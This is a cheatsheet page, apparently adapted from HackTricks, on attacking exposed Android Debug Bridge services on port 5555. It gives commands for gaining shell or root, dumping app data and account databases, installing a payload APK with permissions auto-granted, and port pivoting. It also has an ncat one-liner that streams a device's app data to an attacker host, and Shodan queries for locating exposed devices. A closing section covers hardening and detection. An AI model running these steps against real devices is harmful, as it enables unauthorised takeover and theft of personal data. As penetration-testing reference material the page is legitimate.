daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

5555-android-debug-bridge.md (7229B)


      1 ---
      2 title: "5555 - Android Debug Bridge"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/5555-android-debug-bridge.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/5555-android-debug-bridge.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 5555 - Android Debug Bridge
     14 
     15 ## Basic Information
     16 
     17 From [the docs](https://developer.android.com/studio/command-line/adb):<sup>[[1]](#references)</sup>
     18 
     19 Android Debug Bridge (adb) is a command-line tool to communicate with Android-based devices and emulators. Typical actions include installing packages, debugging, and getting an interactive Unix shell on the device.<sup>[[1]](#references)</sup>
     20 
     21 - Historical default TCP port: 5555 (classic "adb tcpip" mode).
     22 - Modern Wireless debugging (Android 11+) uses TLS pairing and mDNS service discovery. The connect port is dynamic and discovered via mDNS; it may not be 5555. Pairing is done with adb pair host:port followed by adb connect. See the notes below for offensive implications.<sup>[[2]](#references)</sup>
     23 
     24 Example nmap fingerprint:
     25 
     26 ```text
     27 PORT     STATE SERVICE VERSION
     28 5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
     29 ```
     30 
     31 ## Connect
     32 
     33 If you find ADB exposed and reachable, try connecting and enumerating quickly:
     34 
     35 ```bash
     36 adb connect <ip>[:<port>]      # Default is 5555 for classic mode
     37 adb devices -l                 # Confirm it shows as "device" (not unauthorized/offline)
     38 adb shell                      # Get an interactive shell (uid usually shell)
     39 whoami; id; getprop ro.debuggable ro.secure service.adb.tcp.port
     40 adb root || true               # Works on eng/userdebug/insecure builds, many emulators/IoT
     41 ```
     42 
     43 - If the device enforces ADB authentication (ro.adb.secure=1), you’ll need to be pre-authorized (USB RSA auth) or use Android 11+ Wireless debugging pairing (which requires a one-time code displayed on the device).
     44 - Some vendor images, engineering/userdebug builds, emulators, TVs, STBs and development kits expose adbd without auth or with adbd running as root. In those cases, you’ll typically land directly in a shell or root shell.
     45 
     46 For a general ADB command reference, see:
     47 
     48 
     49 [Adb Commands](/hacktricks/mobile-pentesting/android-app-pentesting/adb-commands)
     50 
     51 ## Quick Post-Exploitation
     52 
     53 Once you have shell, validate privileges and SELinux context:
     54 
     55 ```bash
     56 id; getenforce; getprop ro.build.type ro.product.model ro.build.fingerprint
     57 ```
     58 
     59 ### Enumerate and capture data
     60 
     61 - List third-party apps and paths:
     62   ```bash
     63   pm list packages -3
     64   pm path <pkg>
     65   ```
     66 - If you have root (adb root or su works), you can access /data directly. If not, prefer run-as for debuggable apps:
     67   ```bash
     68   # Without root, for a debuggable app
     69   run-as <pkg> sh -c 'cd /data/data/<pkg> && tar cf - .' | tar xf - -C ./loot/<pkg>
     70   
     71   # With root
     72   cp -a /data/data/<pkg> /sdcard/<pkg>
     73   exit
     74   adb pull "/sdcard/<pkg>"
     75   ```
     76 - Useful system artifacts (root required):
     77   - /data/system/users/0/accounts.db and related AccountManager data
     78   - /data/misc/wifi/ (network configs/keys on older versions)
     79   - App-specific SQLite DBs and shared_prefs under /data/data/<pkg>
     80 
     81 You can use this to retrieve sensitive info (e.g., app secrets). For notes about Chrome data considerations, see the issue referenced [here](https://github.com/carlospolop/hacktricks/issues/274).
     82 
     83 ### Code execution and payload delivery
     84 
     85 - Install and auto-grant runtime permissions:
     86   ```bash
     87   adb install -r -g payload.apk         # -g grants all runtime perms declared in manifest
     88   adb shell monkey -p <pkg> -c android.intent.category.LAUNCHER 1
     89   ```
     90 - Start activities/services/broadcasts directly:
     91   ```bash
     92   adb shell am start -n <pkg>/<activity>
     93   adb shell am startservice -n <pkg>/<service>
     94   adb shell am broadcast -a <action>
     95   ```
     96 
     97 ### Port forwarding and pivoting
     98 
     99 Even without root, adb can forward local ports to device ports and vice versa. This is useful to access services bound locally on the device or to expose attacker services to the device.
    100 
    101 - Forward host->device (access a device-local service from your host):
    102   ```bash
    103   adb forward tcp:2222 tcp:22       # If device runs SSH (e.g., Termux/Dropbear)
    104   adb forward tcp:8081 tcp:8080     # Expose app’s local debug server
    105   ```
    106 - Reverse device->host (let the device reach a service on your host):
    107   ```bash
    108   adb reverse tcp:1080 tcp:1080     # Device apps can now reach host:1080 as 127.0.0.1:1080
    109   ```
    110 - File exfiltration over sockets (no sdcard writes):
    111   ```bash
    112   # On host: listen
    113   ncat -lvp 9000 > dump.tar
    114   # On device: send directory as tar (root or run-as as applicable)
    115   adb shell "tar cf - /data/data/<pkg>" | ncat <HOST_IP> 9000
    116   ```
    117 
    118 ## Wireless Debugging (Android 11+)
    119 
    120 Modern Android implements TLS-protected wireless debugging with device-side pairing and mDNS discovery:<sup>[[2]](#references)</sup>
    121 
    122 ```bash
    123 # On the device: Developer options -> Wireless debugging -> Pair device with pairing code
    124 # On attacker host (same L2 network, mDNS allowed):
    125 adb pair <device_ip>:<pair_port>   # Enter the 6-digit code shown on device
    126 adb mdns services                  # Discover _adb-tls-connect._tcp / _adb._tcp services
    127 adb connect <device_ip>:<conn_port>
    128 ```
    129 
    130 Notes
    131 - Ports are dynamic; don’t assume 5555. mDNS service names look like:
    132   - _adb-tls-pairing._tcp (pairing)
    133   - _adb-tls-connect._tcp (paired connect)
    134   - _adb._tcp (legacy/plain)
    135 - If mDNS is filtered, classic USB-assisted enabling may still work on some builds: `adb tcpip 5555` then `adb connect <ip>:5555` (until reboot).
    136 
    137 Offensive implications: if you can interact with the device UI (e.g., physical access or mobile MDM misconfig) to enable Wireless debugging and view the pairing code, you can establish a long-lived paired ADB channel without a cable. Some OEMs expose ADB over TCP in engineering/dev images without pairing—always check.
    138 
    139 ## Hardening / Detection
    140 
    141 Defenders should assume any reachable adbd (TCP) is critical risk.
    142 
    143 - Disable ADB and Wireless debugging when not needed. Revoke USB debugging authorizations in Developer options.
    144 - Ensure network policy blocks inbound TCP/5555 and mDNS-based ADB discovery on untrusted segments.
    145 - On devices under your control:
    146   ```bash
    147   settings put global adb_enabled 0
    148   setprop service.adb.tcp.port -1   # disable TCP listening (or use: adb usb)
    149   stop adbd; start adbd             # restart daemon
    150   ```
    151 - Monitor for mDNS records `_adb._tcp`, `_adb-tls-connect._tcp`, `_adb-tls-pairing._tcp` on corporate networks and alerts for unexpected 5555 listeners.
    152 - Inventory for insecure builds: `getprop ro.debuggable`, `ro.build.type`, and `ro.adb.secure`.
    153 
    154 ## Shodan
    155 
    156 - android debug bridge
    157 - port:5555 product:"Android Debug Bridge"
    158 
    159 
    160 ## References
    161 
    162 - [1] [Android Developers – Android Debug Bridge (adb)](https://developer.android.com/studio/command-line/adb)
    163 - [2] [AOSP – ADB over Wi‑Fi, pairing and mDNS service names](https://android.googlesource.com/platform/packages/modules/adb/+/refs/tags/android-vts-15.0_r2/docs/dev/adb_wifi.md)